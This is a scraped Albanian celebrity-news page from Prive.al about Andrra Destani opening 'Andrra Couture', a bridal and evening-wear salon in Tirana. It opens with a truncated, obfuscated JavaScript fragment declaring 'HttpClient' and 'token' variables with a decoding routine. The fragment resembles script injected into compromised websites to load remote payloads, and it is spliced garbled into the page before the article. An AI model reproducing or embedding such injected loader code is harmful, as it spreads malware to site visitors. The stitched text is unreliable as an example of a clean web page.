;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

‘Andrra Couture’ po vjen: Bukuroshja zbulon detajet e dyqanit që hap dyert së shpejti

By

Pak ditëmë parë, Andrra Destani befasoi kur përmes një postimi bëri të ditur se shumë shpejt, hap biznesin personal – një dyqan veshjesh, duke iu bashkuar ‘valles’ së shumë fytyrave publike që kanë bërë një gjë të tillë paraprakisht në dy vitet e fundit.

Sidoqoftë, pa asnjë detaj shtesë, Andrra preferoi të mos zbulojë më shumë nga ‘Andrra Couture’.

Por, për Prive.al, ajo ka shpalosur ditën e sotme detajet!

Dyqani, siç edhe supozohej do jetë në zonën qendrore të Bllokut në Tiranë.

‘Andrra Couture do jetë një sallon me fustane nusërie dhe fustane mbrëmesh. Gjithçka do jetë e prodhuar nga një dizajner dhe staf i huaj, ekskluzivisht për Andrra Couture’ – është shprehur mes tjerash në prononcimin e bërë Destani.

Tashmë kur e kuptuam se dyqani do mbulojë një gamë të gjerë veshjesh, s’na mbetet gjë tjetër pos të presim deri në hapje për t’ia bërë ‘përhajr’ bukuroshes. /Prive.al/

Artikuj të ngjashëm